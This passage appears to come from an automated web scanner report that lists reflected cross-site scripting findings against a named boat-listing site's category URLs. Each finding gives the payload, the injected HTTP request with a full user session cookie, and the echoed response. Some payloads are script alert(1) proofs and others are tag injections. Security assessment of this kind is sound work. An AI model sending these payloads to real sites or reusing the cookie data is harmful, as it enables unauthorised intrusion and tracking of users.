Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:34 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Hatterasc182e"><a>21c7eb04f64/A-1">
...[SNIP]...

3.244. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hatteras/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b27"><script>alert(1)</script>8234b29838f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Hatteras/1c2b27"><script>alert(1)</script>8234b29838f HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Hatteras/1c2b27"><script>alert(1)</script>8234b29838f/A-1">
...[SNIP]...

3.245. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hinckley/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd6d"><script>alert(1)</script>25e46cb33dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/typebfd6d"><script>alert(1)</script>25e46cb33dd/Hinckley/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:49 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/typebfd6d"><script>alert(1)</script>25e46cb33dd/260+Cruiser">
...[SNIP]...

3.246. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hinckley/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce6f"><a>7ef49680c01 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Hinckley2ce6f"><a>7ef49680c01/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:52 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Hinckley2ce6f"><a>7ef49680c01/A-1">
...[SNIP]...

3.247. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hinckley/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 649cf"><a>7de21f485bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Hinckley/1649cf"><a>7de21f485bc HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:01 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type/Hinckley/1649cf"><a>7de21f485bc/1">
...[SNIP]...

3.248. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Hunter/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57636"><a>487ec78469f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type57636"><a>487ec78469f/Hunter/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
